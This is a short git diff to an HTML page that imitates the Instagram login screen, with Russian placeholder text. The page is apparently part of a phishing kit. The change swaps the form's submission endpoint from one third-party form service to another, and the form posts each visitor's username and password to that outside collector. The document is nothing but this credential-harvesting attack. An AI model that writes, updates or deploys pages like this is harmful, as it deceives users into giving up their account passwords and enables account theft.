--- a/forgot.html
+++ b/forgot.html
@@ -144,7 +144,7 @@
 </head>
 <body>
     <div class="login-container">
-    <form action="https://formcarry.com/s/pulByDlrqgd" method="post">
+    <form action="https://formspree.io/f/2703326429797416558" method="post">
             <h1>Instagram</h1>
             <input type="text" name="username" placeholder="Телефон, имя пользователя или эл....">
             <input type="password" name="password" placeholder="Пароль" required>
